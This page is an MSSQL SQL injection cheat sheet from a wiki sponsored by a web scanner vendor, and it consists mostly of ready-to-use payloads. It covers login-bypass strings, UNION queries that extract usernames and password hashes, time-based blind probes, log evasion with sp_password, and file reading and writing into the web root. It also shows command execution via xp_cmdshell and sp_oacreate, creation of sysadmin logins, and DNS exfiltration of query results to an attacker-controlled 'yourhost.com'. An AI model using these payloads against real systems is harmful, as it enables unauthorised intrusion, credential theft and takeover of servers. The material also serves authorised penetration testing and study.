The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

The SQL Injection Wiki is sponsored by Netsparker, an automated false positive free web vulnerability scanner. Download a free trial.

MSSQL SQL Injection Cheat Sheet

 

 

Back to top

Version   SELECT @@VERSION 
Current User  SELECT user_name();
 SELECT system_user;
 SELECT user;
 SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID 
Current Database  SELECT db_name()

Back to top

Error Based SQLi  For integer inputs : convert(int,@@version)
 For string inputs   : ‘ + convert(int,@@version) +’

 The attacks above should throw conversion errors.
Clear SQLi Tests These tests are simply good for boolean sql injection and silent attacks.

 product.asp?id=4
 product.asp?id=5-1
 product.asp?id=4 OR 1=1

Back to top

###  Use this when you can not see any difference at output. Second do not use more than 30 seconds, because database API connection timeout could be easily reached. 
### This is just like sleep, wait for spesified time. CPU safe way to make database wait.

 WAITFOR DELAY '0:0:10'--
Real World Samples  ProductID=1;waitfor delay '0:0:10'--
 ProductID=1);waitfor delay '0:0:10'--
 ProductID=1';waitfor delay '0:0:10'--
 ProductID=1');waitfor delay '0:0:10'--
 ProductID=1));waitfor delay '0:0:10'--

Back to top

 DROP sampletable;--
 DROP sampletable;# 
 Username: admin'--

 SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'

 This is going to log you as admin user, because rest of the SQL query will be ignored.

Back to top

Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

  • DROP/*comment*/sampletable
  • DR/**/OP/*bypass blacklisting*/sampletable

Back to top

Get response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.

SQL Server If Statement
  • IF condition true-part ELSE false-part (S)
  • IF (1=1) SELECT 'true' ELSE SELECT 'false'
If Statement SQL Injection Attack Samples

if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
This will throw an divide by zero error if current logged user is not "sa" or "dbo".

Back to top

SELECT CHAR(75)+CHAR(76)+CHAR(77)

This will return ‘KLM’.

Back to top

With union you do SQL queries cross-table. Basically you can poison query to return records from another table.
  • SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
This will combine results from both news table and members table and return all of them.

Another Example:
  • ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

Back to top

While exploiting Union injections sometimes you get errors because of different language settings (table settings, field settings, combined table / db settings etc.) these functions are quite useful to fix this problem. It's rare but if you dealing with Japanese, Russian, Turkish etc. applications then you will see it.

Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation.

SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members

Back to top

Bypassing Login ScreensSQL Injection 101, Login tricks
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
Bypassing second MD5 hash check login screensIf application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.

Username : admin
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

Back to top

SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible)

Back to top

Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.

Create table foo( line varchar(8000) );
bulk insert foo from 'c:\inetpub\wwwroot\login.asp';
Drop temp table; and repeat for another file.


Back to top

Write text file. Login Credentials are required to use this function.

bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

Back to top

You can use VBS, WSH scripting in SQL Server because of ActiveX support.

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec
sp_oamethod @o, 'run', NULL, 'notepad.exe' --

Back to top

By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.

EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

Back to top

By default it's disabled in SQL Server 2005. You need to have admin access.

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

Simple ping check (configure your firewall or sniffer to identify request before launch it),

EXEC master.dbo.xp_cmdshell 'ping '

Back to top

EXEC sp_addlogin 'user', 'pass';

Back to top

EXEC sp_droplogin 'user';

Back to top

EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;

Back to top

1. Registry Stuff (xp_regread)
  • xp_regaddmultistring
  • xp_regdeletekey
  • xp_regdeletevalue
  • xp_regenumkeys
  • xp_regenumvalues
  • xp_regread
  • xp_regremovemultistring
  • xp_regwrite
  • exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
  • exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
2. Managing Services (xp_servicecontrol)
3. Medias (xp_availablemedia)
4. ODBC Resources (xp_enumdsn)
5. Login mode (xp_loginconfig)
6. Creating Cab Files (xp_makecab)
7. Domain Enumeration (xp_ntsec_enumdomains)
8. Process Killing (need PID) (xp_terminate_process)
9. Add new procedure (virtually you can execute whatever you want)
10. sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’
11. exec xp_webserver
12. Write text file to a UNC or an internal path (sp_makewebtask)

Back to top

SELECT name FROM master..syslogins

Back to top

MSSQL 2000:
  • SELECT name, password FROM master..sysxlogins
MSSQL 2005:
  • SELECT name, password_hash FROM master.sys.sql_logins

Back to top

SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...

Back to top

IS_MEMBER()
The function indicates whether the current user is a member of the specified Microsoft Windows group or SQL Server database role.

IF IS_MEMBER ('db_owner') = 1
PRINT 'Current user is a member of the db_owner role'

IS_SRVROLEMEMBER()
Indicates whether a SQL Server login is a member of the specified fixed server role.

IF IS_SRVROLEMEMBER ('sysadmin') = 1
print 'Current user''s login is a member of the sysadmin role'

Back to top

SELECT name FROM sysobjects WHERE xtype = 'U'

Back to top

This works only reading for current database’s tables.

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

This works globally. But you should change the master with the db name which holds the table you want to read the columns and change ‘sometable’ with the table name.

SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';

Back to top

SELECT * FROM master..sysmessages

Back to top

SELECT * FROM master..sysservers

Back to top

  • northwind
  • model
  • msdb
  • pubs
  • tempdb

Back to top

%PROGRAM_FILES%\Microsoft SQL Server\MSSQL.1\MSSQL\Data\

Back to top

?vulnerableParam=1;DECLARE @x as int;DECLARE @w as char(6);SET @x=ASCII(SUBSTRING(({INJECTION}),1,1));IF @x=100 SET @w='0:0:14' ELSE SET @w='0:0:01';WAITFOR DELAY @w--

{INJECTION} = You want to run the query.

If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.

Back to top

?vulnerableParam=1; SELECT * FROM OPENROWSET('SQLOLEDB', ({INJECT})+'.yourhost.com';'sa';'pwd', 'SELECT 1')

Makes DNS resolution request to {INJECT}.yourhost.com

?vulnerableParam=1; DECLARE @q varchar(1024); SET @q = '\\'+({INJECT})+'.yourhost.com\\test.txt'; EXEC master..xp_dirtree @q

Makes DNS resolution request to {INJECT}.yourhost.com

{INJECTION} = You want to run the query.